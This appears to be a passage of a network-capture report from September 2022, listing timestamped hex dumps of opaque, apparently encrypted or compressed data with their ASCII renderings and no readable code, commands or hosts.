                                                                                                                                                2022-09-29 12:51:48 UTC27458INData Raw: c0 03 f9 d0 b4 88 30 fd 0e 3b 65 1a 2a 7a 28 79 9d dc 5e b3 d8 9a a7 68 eb b8 10 81 a3 b2 99 a4 db 1c f4 82 10 8a e9 7b 02 e3 f9 ea 52 47 94 6d 86 3a 9c 2c 66 0e 23 76 17 2e b1 63 e8 7a 9d 69 f6 d9 76 f8 91 42 b7 27 4c 3f 55 dd 58 a8 4e e3 4c 6a e3 e1 29 23 44 a5 bd c2 eb 2c b8 cc a3 eb 9b 25 53 30 a9 1d d4 c3 fb 12 35 ef b8 98 96 81 bc 64 53 84 b1 2c ca 5a d9 eb 4e 68 f8 76 15 cf cc 70 52 5c 9f 79 78 5a 8b f7 ce 14 ca d3 2a f0 1f d8 1c 73 76 b9 73 28 97 be 30 48 59 15 e7 d3 f7 4b 1d 63 3a 7c eb e3 80 f2 74 1a be df 82 98 3e a1 e7 42 9b cb e1 3b 8b d7 30 b0 c5 c8 d6 28 3b 57 1d 50 37 4d 41 94 95 59 41 fd 4a 07 a5 b0 f6 c5 8a b8 36 29 c7 fa c7 d8 49 37 41 28 2b 36 f6 49 d8 ac cb e9 64 49 92 46 a3 94 90 fc ec c2 62 3d 85 41 e2 34 42 9d b7 69 b2 08 af 1b c6
                                                                                                                                                Data Ascii: 0;e*z(y^h{RGm:,f#v.czivB'L?UXNLj)#D,%S05dS,ZNhvpR\yxZ*svs(0HYKc:|t>B;0(;WP7MAYAJ6)I7A(+6IdIFb=A4Bi
                                                                                                                                                2022-09-29 12:51:48 UTC27474INData Raw: 73 d3 fa 9b de d3 8d 51 fa 2c d9 09 96 f8 12 d3 63 0f 6d 4d 1c 5d 0d 35 38 a4 8a 94 13 62 f2 1c 33 2a 53 60 33 34 3b 87 a8 98 89 5b c7 ff 8e c5 97 c3 b7 10 bd 07 88 0a 31 53 07 87 1b b4 57 6e 5a 6d be e4 65 c6 13 17 7c 21 c8 ea f8 3c c2 d6 14 5b 67 98 3f a6 3a 1b 59 3a fc f7 8e 94 e2 47 c7 ee 2b 8c a2 0c cf a4 3a 8d bc 81 f8 dd 73 d7 e3 b6 68 52 dc 8b d0 fa f3 df 2b 89 48 97 e6 9a b0 1d aa 91 dd 8e 96 f5 d6 1d 5c 64 f9 26 73 86 b5 61 1f fb c5 40 41 85 20 d0 b6 d9 f8 b5 33 4a 20 a8 13 50 89 e8 b2 ac c4 a7 97 04 da 3b 33 76 37 dd 74 98 b1 2d 68 3f b5 09 78 02 27 0d 91 96 9e 0a 9d 93 6d 33 63 92 ca 33 e2 0b 00 f4 d2 f0 a2 44 08 d0 3e 78 90 57 a6 e6 20 de c6 6a d0 cf 0d ff e7 af 71 99 81 8a 80 22 db e3 fe d2 ed 29 e9 e3 a8 55 ab 3c ee 33 73 e8 04 77 7a a1 a3
                                                                                                                                                Data Ascii: sQ,cmM]58b3*S`34;[1SWnZme|!<[g?:Y:G+:shR+H\d&sa@A 3J P;3v7t-h?x'm3c3D>xW jq")U<3swz
                                                                                                                                                2022-09-29 12:51:48 UTC27490INData Raw: 34 82 2d 7b 5b 32 99 f4 7e 12 8c 5e b0 8d 87 83 ff 87 28 80 c8 e2 61 12 7a 1f e4 5b 81 2d 67 51 29 dd 6c 0e 09 2a b3 bd 69 77 8c 0f 03 b3 0d 8a 66 09 3a 4e 17 ef 3b 6f e2 42 fa e7 a6 2e 96 82 15 6d d9 22 48 b3 be 6b e8 03 4c 83 11 db 7b 56 a8 9e ff b5 5f c1 20 da 6f f8 0a 56 df a6 ad 27 0d f8 6e 14 63 09 64 18 62 59 aa 05 1b b3 da 81 d9 62 b9 73 76 24 3a 55 a9 81 08 fd bb fc 26 66 16 ef e4 f3 8d 30 fe 80 8c 17 89 3b 0b 3e 38 9b a2 d6 75 b5 9d b8 02 9d 7b c5 3c 6e 3a bc 22 55 75 f9 e0 97 ed 54 35 57 5c 7e ae 6a e1 13 01 83 96 8e 2a f5 4c ae 47 dc f9 00 34 d1 b1 ac 0c 1b 3d 76 9e 6b ac 30 94 04 e9 7a 31 40 a5 2e 55 0a bd e3 df 3a 98 e3 0f b1 19 fc f7 d1 0b 1b 76 02 55 0b 45 df 26 67 8a 3c 5d 68 f9 9e 48 e0 03 c6 c3 a8 f7 d5 5f dd 1c d4 14 50 cd de 5d 49 79
                                                                                                                                                Data Ascii: 4-{[2~^(az[-gQ)l*iwf:N;oB.m"HkL{V_ oV'ncdbYbsv$:U&f0;>8u{<n:"UuT5W\~j*LG4=vk0z1@.U:vUE&g<]hH_P]Iy
                                                                                                                                                2022-09-29 12:51:48 UTC27506INData Raw: fb 60 26 30 d0 ce 8e 1a d0 29 f7 3a cc d3 47 1f 19 fc aa cf 24 b7 ba d0 85 42 fe be e3 aa 8a bb 82 35 07 fb 70 20 fe 78 29 2e 45 a3 96 08 2f e1 f4 f8 77 d8 a6 83 83 a6 9d 64 8a 42 45 a7 c5 bb c3 4c 95 51 46 3e 1f 87 cd 37 9e 89 19 15 af b5 d2 91 50 21 8b 6f 15 59 08 e5 97 69 f3 16 01 09 7a 36 f8 53 fb 3d 04 03 75 4f c2 cd 03 0c 22 ac 3b a1 2a a9 6d ee 76 df b0 20 d5 6f 8a 13 78 31 86 21 6c 3f 98 01 7e 67 8b 9d ae 5a 86 bd a9 c9 32 e9 47 58 87 9f 45 37 2f 73 17 f8 2f 38 88 2b 50 eb 89 b6 72 24 6e c8 a9 d8 c7 51 53 7c 9e 64 4c 69 ea fe 93 e4 61 38 6e fd 04 9e 17 c8 ae 6d 50 93 a9 37 d4 02 ba 47 33 30 2a 97 4d 9c 30 21 ab 33 1c c1 8c 39 6d db 86 cb 0a 63 91 f0 47 35 2c 29 08 2f cf 32 d6 59 3e 10 5e 7c b7 7e 3e b9 dd 84 e3 38 1b f1 32 a8 2c c2 2d 39 d5 7f d7
                                                                                                                                                Data Ascii: `&0):G$B5p x).E/wdBELQF>7P!oYiz6S=uO";*mv ox1!l?~gZ2GXE7/s/8+Pr$nQS|dLia8nmP7G30*M0!39mcG5,)/2Y>^|~>82,-9
                                                                                                                                                2022-09-29 12:51:48 UTC27522INData Raw: ea 87 89 0b 0f 08 96 bb c6 69 71 1e 99 7a 7e 16 8d 52 6e ad c1 cc ba 27 9e 5b 8c bc de 36 f4 1f 6e de 5d c8 ca 4b 28 4e 4b 18 b8 44 2f bb c2 5b 53 c8 e7 35 31 ab 04 f8 4d 93 45 7f 78 7a 69 95 61 59 ec 7b 3d 28 95 73 ab 89 64 df 68 63 71 8d 11 21 37 04 57 9a 94 29 83 ae b3 65 0f ba f4 1a 41 f3 f7 4a 3e ea 0a 0b 5d ea 6a e8 ed c7 1b f0 49 22 6b 6c 91 a6 35 af 62 0d f0 e7 a0 23 e3 6a 9d df 0e 4b c5 bb 91 73 c9 ac 1f 6c 9f 68 fe c7 a8 5f 03 d6 91 32 eb 59 5f b0 04 ea ac e7 a4 06 93 81 3b b2 73 23 ec 72 19 6d e4 9d 13 eb 5c be be d8 d2 5d 92 78 5b e8 d2 89 75 84 30 87 b0 c1 8d bd 0e 1a 24 80 b8 41 cc ca e2 aa a8 d7 44 a7 3e 7a 00 05 a5 8e 6a 2f b9 1c a8 f7 20 49 bc 5b 16 ac 09 1f bc d1 72 e7 1f 03 a0 ad 32 91 6f 02 45 8f d0 0e 57 42 41 c4 5b fb b5 02 f5 f0 67
                                                                                                                                                Data Ascii: iqz~Rn'[6n]K(NKD/[S51MExziaY{=(sdhcq!7W)eAJ>]jI"kl5b#jKslh_2Y_;s#rm\]x[u0$AD>zj/ I[r2oEWBA[g
                                                                                                                                                2022-09-29 12:51:48 UTC27538INData Raw: c2 08 0d 26 2f 12 a9 8e e4 d3 36 ad f7 25 03 e8 e8 4e 97 a7 71 1e 6a 39 19 f8 c4 2a f7 a9 87 22 78 c1 4d d7 07 97 e4 21 88 55 19 93 1c a5 4a 26 ec 53 3c 93 6c 14 34 ba 8a 01 50 7b d4 17 b4 a1 03 bf 53 30 5f 9c c4 62 5a 50 79 9d 1c 85 1e a1 6e 84 95 9f 6b 6f 27 b7 f3 99 23 79 9f f1 f9 1c 3f 4a d2 66 3f 48 b8 3c 68 fe 95 0b 0c dc 5a f5 f6 57 43 06 9a af a5 7e d5 77 99 9b 67 c1 44 a3 27 58 76 c1 f1 9b f3 a7 be 85 f6 08 30 7f 2b 26 51 0b 54 86 50 89 ad 96 be 54 58 4e c8 b4 d2 71 83 70 4c 9b 68 77 5f 5c 36 7b 5f 1a c9 c2 b5 9d e5 e3 e1 ae 1e 19 c9 ce fc 93 cf da b8 bd 2c 78 42 4f ba 1a 65 d6 c5 1d 53 28 dd cf 69 1b 28 10 bf 51 3f d4 c7 a9 66 07 1f 09 90 ce 6a 89 3e 4c 2e ed 1e 9c f3 4f 0d 7d 91 8e b6 57 00 39 c0 0a d5 21 36 7e a0 ae 82 f5 79 dc ea 9a 4c 2a 6d
                                                                                                                                                Data Ascii: &/6%Nqj9*"xM!UJ&S<l4P{S0_bZPynko'#y?Jf?H<hZWC~wgD'Xv0+&QTPTXNqpLhw_\6{_,xBOeS(i(Q?fj>L.O}W9!6~yL*m
                                                                                                                                                2022-09-29 12:51:48 UTC27554INData Raw: 29 dd 9a 9f fc 4a 8f 33 e2 d4 8f 2a 4a 61 be 1a 02 39 50 10 3a 4b d0 e9 47 a1 79 75 4c 22 2d d1 42 94 9a cb 70 af 88 25 93 f4 48 35 16 c3 30 2a da 4b 85 b3 ca 60 5e ae 1e a2 c3 02 34 8e 44 3f 29 01 ad ac 65 8e 92 e9 a2 8a 02 c6 87 14 e5 bc 2a 48 bb 83 c7 08 1a c7 23 b0 c1 21 06 ff ca 72 e1 3b bd 6a e2 09 fe b9 c1 39 0a 6e df 11 8b d7 d3 ce 5a 86 42 01 77 87 05 3b 1b 6a ff d2 72 7d 7d 50 a6 a0 9c aa 99 d7 4c fc 70 26 0c 7c fd 87 80 c8 b0 35 c3 79 53 33 69 39 81 ab 93 32 bf 2c 7a b8 44 b5 21 48 4d 6f 9b 89 41 bc 6d e0 15 3b 1b 6b 69 bb c2 fc 60 b8 dd c8 9c 08 7f fc 23 f5 68 74 68 a5 5f 60 43 29 4d 22 50 a8 85 3f 24 cb df 9f a4 a1 13 9e 6b 2a c9 a7 35 12 7e d3 2b c1 1a bc 6c fc 54 98 3d 9c d4 c0 1c 04 4d 06 f1 09 43 2d bf d9 92 37 17 81 ec 98 af c2 dd 2c f3
                                                                                                                                                Data Ascii: )J3*Ja9P:KGyuL"-Bp%H50*K`^4D?)e*H#!r;j9nZBw;jr}}PLp&|5yS3i92,zD!HMoAm;ki`#hth_`C)M"P?$k*5~+lT=MC-7,
                                                                                                                                                2022-09-29 12:51:48 UTC27570INData Raw: ff 12 86 10 dc 28 5a c6 86 08 1d 71 ab 53 c4 22 61 b9 40 77 c4 c7 79 7e 85 11 06 25 dd 10 07 15 fd 64 9a 2b 0d 58 72 11 f9 9f 5b 21 dc 27 c8 aa 6f 28 4b e6 49 51 7d 89 f9 8b ab 23 03 4b 87 50 75 91 7b d7 7c 73 a6 67 d1 37 4d a1 b1 60 17 c6 aa 84 77 eb 51 25 d6 89 50 39 15 d5 6a a7 25 b5 45 d1 1c 63 90 bc 58 21 89 77 db 92 80 8e 24 09 ac 7c a0 d2 30 42 9c 1a 09 25 81 a0 ea 23 4e ac e1 c8 2b 8f c0 61 8c e1 b0 83 a7 fb 4d ea ac 33 5c 44 9f da 69 1f bd c6 a7 2e 65 89 13 9d b3 5c 6a 9a 1f 35 d8 dc b4 f0 3a 6e 55 71 fc 58 5e 46 48 c5 f2 5a 57 9e f2 78 8a 99 a6 aa 76 4a 91 b0 71 31 59 a4 e3 3c 88 5d be 77 b6 a0 8c 48 47 e0 62 9c 30 33 5f 56 c9 f1 81 62 1e da 3b 7d 5f f2 7c f1 3b 2b 94 fb f4 97 96 81 85 68 ef f9 f2 07 1e c0 a3 8d 58 b1 82 b4 3d 86 de 7c 47 e5 29
                                                                                                                                                Data Ascii: (ZqS"a@wy~%d+Xr[!'o(KIQ}#KPu{|sg7M`wQ%P9j%EcX!w$|0B%#N+aM3\Di.e\j5:nUqX^FHZWxvJq1Y<]wHGb03_Vb;}_|;+hX=|G)
                                                                                                                                                2022-09-29 12:51:48 UTC27586INData Raw: 9e c2 99 d2 1d fc f4 e3 c6 5e 93 4a 2a 7f 70 ca c6 d6 38 80 83 07 00 cc 63 ac 67 fb 6f 47 41 12 4d f1 a6 48 69 da da f0 22 ee 86 13 25 d9 e6 17 ed 46 c3 c2 d7 be 89 94 4d bd fa d0 b4 2b fd dd a7 80 7b e8 67 a0 fe 56 d2 ba 59 19 26 0f 9f 70 44 11 12 55 e3 36 a5 79 ac fd 1c 5e 4b 1d 3e 3c 71 1c 5d ba 96 04 a7 2b 9b dc f6 19 de 5d 98 80 70 27 7b e6 03 b7 df af d0 db d1 34 72 ea 7f 62 90 df a8 ca 4e 6c eb 55 06 53 fd 09 37 78 dc ed 5e 87 a7 b6 8b 7a e9 27 a9 a3 ce da 68 64 7f fb d3 6d d6 ab 27 24 38 db 4b b2 ec 49 66 c1 eb 1a 62 e8 aa dd 39 1d ab d5 6f 85 26 4e 62 56 d7 bc a6 39 e4 f6 d1 af aa 31 a4 4d ea e7 86 79 c1 68 ac d4 f3 cd e3 d8 20 f1 69 d5 8e ee 85 06 91 df 5d 68 43 0b 95 23 4f c2 cc 2f 72 d2 c1 30 f6 40 fe e3 0f bc 11 d0 a8 1e a5 55 88 8d f0 a1 e6
                                                                                                                                                Data Ascii: ^J*p8cgoGAMHi"%FM+{gVY&pDU6y^K><q]+]p'{4rbNlUS7x^z'hdm'$8KIfb9o&NbV91Myh i]hC#O/r0@U
                                                                                                                                                2022-09-29 12:51:48 UTC27602INData Raw: 56 ca 84 31 c1 65 41 64 a4 7c 1a ba a6 5c 1d 94 74 e3 45 92 43 0e c0 23 d2 d6 dc db d0 23 a7 30 b3 03 f3 71 5a 57 77 e7 4f 4e 14 05 b1 80 b1 f2 93 4c 5e 95 4d 31 dd f5 71 4a dc 3f ca 7f ec 6d b1 7f 11 f9 10 79 ed 9d 4f 6d 56 8e 7b dd 80 8a 5f d5 06 59 74 0a ee f5 df ae 55 47 49 a5 37 ee 01 cb 6b cf d5 0a 4e 3b 3d 4f 49 e7 bb bf b6 45 a9 78 77 35 b0 42 04 80 cf c5 a2 a6 4a af 81 6f 65 9f 24 5a 5e ec c2 78 9e dd e4 ab 62 86 ef 5d 78 e3 41 79 91 14 a1 dd 5e 14 b9 8c 84 52 29 47 63 49 4f 7b 54 2d 57 85 66 5e c2 f0 26 85 82 f7 93 db db 41 ae c9 0f 64 66 14 31 3f 2b a5 66 f1 86 92 05 ac 29 86 e6 e0 63 bb 01 42 98 78 99 ed df 9c 63 47 84 99 8f be aa 0f 58 3d 9b 59 39 87 9b ff 6d b8 e2 e9 c7 81 b5 a7 5e 64 62 da 12 1a 60 d7 b0 10 f9 a3 f7 cc c8 e3 f5 bf ab 21 e2
                                                                                                                                                Data Ascii: V1eAd|\tEC##0qZWwONL^M1qJ?myOmV{_YtUGI7kN;=OIExw5BJoe$Z^xb]xAy^R)GcIO{T-Wf^&Adf1?+f)cBxcGX=Y9m^db`!
                                                                                                                                                2022-09-29 12:51:48 UTC27618INData Raw: a6 e0 16 92 f1 5e f6 71 13 80 75 eb ea 2a 84 38 ab f9 b0 5a 00 5e 34 a9 f7 c1 f7 37 22 ea ae be 98 62 ff c7 80 49 82 ea 8e 8e 56 ee b8 59 c2 05 87 0f 52 ad 99 f2 0e 1a c0 fd e6 c4 79 64 26 23 4b 33 62 99 08 c9 72 24 94 4a 2c 52 67 e8 fd e0 8d d7 e0 69 1f c6 33 88 18 fb a9 aa 7a 2f 94 9e 72 a5 c2 91 29 b4 36 dd 50 c2 87 19 b4 2d 62 ec 52 78 a3 09 a9 6e 3a dc 1b 70 5b 3e 5c 7c ce 01 cf 00 ab 5b 8e 8b da 76 7e c2 b8 4a 24 4a 8c 47 bc 2b 62 b5 2a a8 c7 7b c8 75 a0 80 e6 1c e4 06 1d 74 2a 44 58 f9 ef 95 f8 09 ce cf 8a 9e 7a 6d 1c c1 dc 8a 5f 84 9d 3b 0d d5 65 f3 05 ab 6c 9a e3 a0 8e 86 49 b2 2b 1c ac 9d 68 97 50 4b 99 0c 9a 90 87 ba 13 54 e5 87 cc d3 71 44 f6 1d 92 09 0b 82 a1 be 12 69 b2 51 bd aa 40 ed f6 c0 cb e2 7e 9d cf 97 44 1c 4f e9 15 69 d3 ea 93 e5 8c
                                                                                                                                                Data Ascii: ^qu*8Z^47"bIVYRyd&#K3br$J,Rgi3z/r)6P-bRxn:p[>\|[v~J$JG+b*{ut*DXzm_;elI+hPKTqDiQ@~DOi
                                                                                                                                                2022-09-29 12:51:48 UTC27634INData Raw: ef 42 46 92 1f 74 07 59 cb b6 99 b0 54 07 42 9b ec 97 13 cc 68 78 8a 11 a0 cc a5 48 dc b7 a2 4d 47 e8 43 3a 14 46 46 70 f7 17 87 85 55 7c 05 0f 30 fa 99 64 9d 82 e7 6b 21 6c 63 66 b7 be d5 47 94 01 39 f6 94 e0 c0 9d 16 dc e0 17 e2 af 63 71 6a 5d cc d6 b4 90 67 a9 1b 2e 87 4a e6 79 14 79 bd 33 15 b4 3f d8 bf 62 15 0e a5 88 91 78 24 54 db 75 17 a0 90 4f 48 c2 95 63 35 28 be 6c 91 21 b8 6a c1 da 3a b5 5b 34 a0 b2 1a 0f 80 b4 ab 82 d9 8d 87 4e 9e 6b 9c fc ce 21 10 91 17 eb 6a 07 70 00 92 c8 5c 88 4b 84 36 53 c9 e2 f6 01 3e 5e e6 77 c9 c2 70 d1 df 0a 20 e4 53 18 a1 f7 58 cc 4a 8b 42 c2 13 87 87 0a 26 42 f1 a4 87 d7 8f 60 94 45 80 7f d1 aa 30 2b e9 e8 ca c4 fc 73 3a 19 bc 11 11 2e 58 12 80 6a 15 cc ab 34 42 1f 03 04 87 8c 5d ec 33 12 40 39 cb 84 ea dd 27 bd 8a
                                                                                                                                                Data Ascii: BFtYTBhxHMGC:FFpU|0dk!lcfG9cqj]g.Jyy3?bx$TuOHc5(l!j:[4Nk!jp\K6S>^wp SXJB&B`E0+s:.Xj4B]3@9'
                                                                                                                                                2022-09-29 12:51:48 UTC27650INData Raw: a3 d0 6b 69 ec 9a 44 7f 77 26 ff 0b b8 8f e7 43 2d 91 97 ac e0 73 19 1c a1 c7 ee d7 fc d9 a9 c8 68 84 e4 30 6e 58 4e 65 51 bc 20 0b 03 a3 6a 46 8c 3a 97 4e 41 86 82 f5 e4 6c 5e 67 46 11 da 09 d6 af a7 a7 62 e5 af 6e 47 8f 43 4e 1f a9 cc 82 94 38 f8 83 55 f4 fb 3b a9 f7 04 8e 72 5d 17 1f c8 d5 1a 8d bd 0d f6 d6 6a 71 41 cb a9 3a 17 8e 14 cd df 2d 6b f6 41 4c b1 61 6d c7 54 17 2d 96 30 1b 19 e7 ba 7f 46 7d 83 4f d8 79 c5 6b 41 82 f7 09 d5 7b 34 4f 47 41 35 ff 5d 32 96 31 35 3b 4f 99 ce ed fc 09 be 14 3b 64 93 d4 54 c4 b1 f0 49 4a 05 86 e5 48 8a 61 b3 8b 7c 17 cf 82 8f 3b 76 8e af 72 07 17 9b 50 d0 ac f6 44 a0 52 6e bd f3 11 5f 64 47 2a fd 6a cd 71 75 b6 13 b3 c0 42 dc 2d c2 a1 86 48 a1 7b e6 dd a4 78 d8 62 23 1d 21 75 2d b3 38 98 4b ab 14 f1 b6 23 2e 1a e5
                                                                                                                                                Data Ascii: kiDw&C-sh0nXNeQ jF:NAl^gFbnGCN8U;r]jqA:-kALamT-0F}OykA{4OGA5]215;O;dTIJHa|;vrPDRn_dG*jquB-H{xb#!u-8K#.
                                                                                                                                                2022-09-29 12:51:48 UTC27666INData Raw: 7f eb 92 a2 ca d6 ae 5c 29 6e 93 33 7c f0 8b fa ed ea db 5a 80 b8 a0 ca e2 2e 78 56 47 37 fd a2 79 68 ff 53 e8 3c a1 0a 3f b9 09 2a a9 52 94 9c 0b fd 19 d0 b6 f6 3e 4c 9b ce 70 a2 85 97 f0 3a e4 4b 4c 1b e1 3b d3 81 22 a5 3f 7d e5 12 a7 cb c8 42 c9 30 96 90 23 7c f9 43 e6 10 ab 2c b4 09 8d 9d 03 a1 91 f8 d6 25 1a 11 51 cf f9 e1 a6 43 d4 cb 35 f1 e0 7a 2e 10 09 57 66 26 bb 79 bc 6f b3 42 7a 27 35 8e 4b 90 47 ef 91 22 37 03 de 45 1a 9e 4d 2f a5 f2 c3 ed e9 5f 87 63 d6 fe 04 15 16 69 05 ff 89 df f0 08 09 bd 1c 6b 59 1c 79 09 5e a9 28 90 8c 73 71 22 db 41 47 71 3b e0 4f 15 e3 0a c0 a6 e6 ce f9 ad 42 04 d1 31 3c e0 59 cd 58 d9 45 46 5e 14 6b eb 5e 89 c6 26 6c 26 d0 cb 66 f1 a1 85 d8 4d bd b7 9b 92 82 ad 9a dd 81 ab 90 b9 ce f6 42 2d 54 5e 6b 74 19 5e f2 7b ba
                                                                                                                                                Data Ascii: \)n3|Z.xVG7yhS<?*R>Lp:KL;"?}B0#|C,%QC5z.Wf&yoBz'5KG"7EM/_cikYy^(sq"AGq;OB1<YXEF^k^&l&fMB-T^kt^{
                                                                                                                                                2022-09-29 12:51:48 UTC27682INData Raw: af 31 5f 6c ab 76 d2 7a a6 da 6b e6 8d 23 2e 88 d7 6c 02 09 54 9f a5 1a ec ac 34 8b bf 2e d6 d9 8f b7 ef f0 2b b3 26 69 5e 14 1f 3c 8e d0 dd f7 b8 56 d1 dd c1 2a 40 e4 27 65 32 80 87 70 87 e5 d9 98 34 6e af 03 f1 46 ab eb 1c a1 91 87 10 a1 52 d9 ee 79 91 df 37 32 87 50 4e d7 65 d1 4e 7c 27 23 72 e6 ab 45 3f 7f 6b 4b c8 00 9d 66 d6 7d 78 0c 8b a7 32 63 3e bb aa ce 87 28 c5 a3 64 4d 56 11 83 62 f4 2d 78 ff c1 49 7a e7 92 4c c1 b7 a7 4d 3e 8c 46 b6 68 2d 36 3f b9 f8 c4 05 68 9a f7 0a b2 be fc 81 58 c2 a2 22 df 21 35 d8 c6 7f 37 d5 d9 ec e8 ad ec d7 6a 54 3d 0d 40 d0 91 49 fa fd 84 16 c6 b8 c3 9b 47 15 e7 e9 f2 f5 49 61 9d 23 7f 44 29 96 ed a5 d8 11 12 de ca 05 ad 6a a4 09 59 de 49 7c 77 bf 90 93 be fd cf 0e e4 a1 0e 92 8f ce e1 d7 26 34 4e f1 94 f1 8e f9 8f
                                                                                                                                                Data Ascii: 1_lvzk#.lT4.+&i^<V*@'e2p4nFRy72PNeN|'#rE?kKf}x2c>(dMVb-xIzLM>Fh-6?hX"!57jT=@IGIa#D)jYI|w&4N
                                                                                                                                                2022-09-29 12:51:48 UTC27698INData Raw: 27 58 43 b2 9c fe 22 6e 36 4b 2b c5 d7 11 5f ec 65 d5 e4 24 6f 74 c5 9e f6 4c a0 35 c4 40 67 9b be fe 7e a7 f4 d4 cb 19 72 2e 1c d5 17 da 25 fc e7 0c ee 77 fe 0d af 28 e7 f4 a2 f0 8c 5e 17 17 df f6 02 0e 7a 1f 72 79 33 6c 23 92 d6 54 39 93 c1 b3 9c 48 34 76 ac a2 d3 6e e3 c8 92 45 a9 c2 50 74 91 61 2c 96 f0 cc 32 6e c5 af a6 af 48 71 2f a3 16 9d 85 50 7d 13 90 1a 8c bc f0 f0 88 ed 04 d0 77 24 10 ab a6 5d d6 bf 87 81 33 2d cc 3c 19 4c 79 e8 52 62 7a 87 9c 09 f0 4c 50 aa 97 4f 4b d0 90 08 a7 f8 24 86 ff fc b7 6a f0 ce 90 d0 2b e7 7f 17 ff 15 af 0b ff 63 66 3d 0c 37 32 c4 1d 13 b1 12 34 df da 8f c9 94 a3 8a cc 4c d5 7c dc 0d f0 39 23 ba c4 67 79 ef b4 90 3a 66 ff 94 29 9a 8b 5c 96 ff 87 95 8d b2 00 02 6a 79 f7 cc ff 6f dd a1 35 49 f1 d7 0e 70 f4 ec b7 b2 65
                                                                                                                                                Data Ascii: 'XC"n6K+_e$otL5@g~r.%w(^zry3l#T9H4vnEPta,2nHq/P}w$]3-<LyRbzLPOK$j+cf=724L|9#gy:f)\jyo5Ipe
                                                                                                                                                2022-09-29 12:51:48 UTC27714INData Raw: f0 7a 46 2c 00 9a 14 9c bf d3 7a ad 7a 50 9e cc 97 da dc ed d5 13 c2 5c fd ac 5a aa 87 c9 d0 bd 47 91 54 90 0b 0b fa e6 fd 88 55 c7 7c 71 14 d2 a6 dc 9d cb 01 82 70 c2 56 45 cd 1a fd 7a a6 65 bb 57 19 80 84 b3 4e 3b 8a c4 d3 3e 1c 0c 3e d9 1a bd b6 7e 8e f1 a3 c5 7b a8 d0 0c 1c 5c 4c 03 fe 8a 1d 6b 39 9a 14 a6 a3 1c 7a 4f 6e 2a 95 1a fe 0a 92 05 60 08 73 a3 99 d1 ea 2c 06 82 34 e3 e2 ba 33 f7 77 f0 17 dc 70 6a bf a2 7b dd 58 07 04 c7 ba 05 e3 df e3 c8 20 39 1f 9c 40 33 40 05 de ff 7b ca ad 96 b9 e3 72 27 aa 56 89 02 de 54 ec eb 44 42 91 74 ce 00 da 08 40 6d 9e fc 7e b2 77 10 75 26 ae 75 38 49 b8 9b ee 6b fe 65 5b f8 60 7b dc 4c f0 f6 49 d9 76 a8 21 10 88 77 37 e6 ce 31 cd dc 33 4a e6 c8 9e d8 91 f8 4b 55 2d 33 4f 2b 6d a8 3b 26 b5 10 0f 6b 81 f4 5f 7e 83
                                                                                                                                                Data Ascii: zF,zzP\ZGTU|qpVEzeWN;>>~{\Lk9zOn*`s,43wpj{X 9@3@{r'VTDBt@m~wu&u8Ike[`{LIv!w713JKU-3O+m;&k_~
                                                                                                                                                2022-09-29 12:51:48 UTC27730INData Raw: 07 1a f0 38 fa ce 59 c6 37 2d 37 83 1a 9c fb 79 0b 3c 6e d0 86 f8 00 52 8f e7 76 8d c3 19 8e 5b 7a 74 05 24 ae f9 3a a0 87 5f 69 08 64 ad 7c a0 86 bb 3a a7 a1 ef 3e 67 9c fa 70 bf 3a 0c 8f 6f 45 65 e8 fa 03 02 09 97 5a e9 93 8b b0 4b 7e 00 9a 2c 6a 5c 31 e5 de 27 f1 d7 b3 92 2d 00 ff 57 7c 54 fd cf 36 a3 16 4d 43 3d d3 b5 d2 ab de 6c 6b 98 8e 94 cf 7e d8 31 57 83 36 7f da 74 dc 64 15 11 9f 88 30 82 2c cd 53 03 90 6b f7 55 b9 04 8b c0 1c dc 52 9c 49 05 7c e2 a4 df 00 70 72 cc 17 15 eb f9 bb 18 ed 81 20 65 41 07 1c 36 68 9e b1 d6 9c 88 a9 c5 77 46 9a bc 82 28 62 ca b2 b5 0c 30 fa 44 0b 2c 7e 87 00 2f ee c3 1b 83 14 d5 46 67 78 dc 99 e6 bf 75 8d 39 12 a6 a7 b9 c1 b2 2f cb 0c 6f 75 d3 9d 4c a6 64 d6 b5 41 18 d0 09 69 44 b5 72 06 6b 85 44 89 f2 4e 81 33 d6 7f
                                                                                                                                                Data Ascii: 8Y7-7y<nRv[zt$:_id|:>gp:oEeZK~,j\1'-W|T6MC=lk~1W6td0,SkURI|pr eA6hwF(b0D,~/Fgxu9/ouLdAiDrkDN3
                                                                                                                                                2022-09-29 12:51:48 UTC27746INData Raw: 0b 0b c5 24 3d b8 3f 75 dd df 6f f3 22 82 a8 57 05 90 81 c0 23 3f b5 89 60 17 75 54 8b 32 46 c6 16 23 b6 96 47 06 3d 78 0e 33 2b 5e 4e cb 6f bd 48 39 f3 b7 9f bb 8c 3d 98 9f 57 5f a8 8e 8b 7b e4 96 9e 46 6a 56 a3 7c c2 fc 1c 4b d6 89 a4 44 25 5d b7 44 dc 4a cd 10 d4 96 c0 aa c5 75 1f 2b 3e 92 a2 ca ec 49 aa 87 da 06 a4 be e4 a5 e5 63 d2 6f c1 8c c3 20 c3 c8 f2 dd 7a 58 ea b4 ed 1b fb 2a b0 f1 a4 03 3f e0 e8 b5 a7 47 64 75 41 b9 f7 9a 8f 83 5f ce e4 bf ab 1b ec 02 8a 88 50 54 28 8e 71 0f 3a b5 ce 30 52 24 fb a2 52 3c c9 48 27 38 83 99 cb b0 df 5c a2 7b f0 d2 b7 83 e8 be c6 78 84 48 a4 30 0f b5 56 bd 06 ca 6e 08 a0 a4 7e 92 05 cb 28 52 30 37 8f 84 26 39 25 80 42 2e 73 7b aa 8e f7 42 d7 6f 2f c4 a1 33 84 62 5b 02 dd 57 8d 39 3f de 01 a6 e5 c8 8a 04 c6 ff a7
                                                                                                                                                Data Ascii: $=?uo"W#?`uT2F#G=x3+^NoH9=W_{FjV|KD%]DJu+>Ico zX*?GduA_PT(q:0R$R<H'8\{xH0Vn~(R07&9%B.s{Bo/3b[W9?
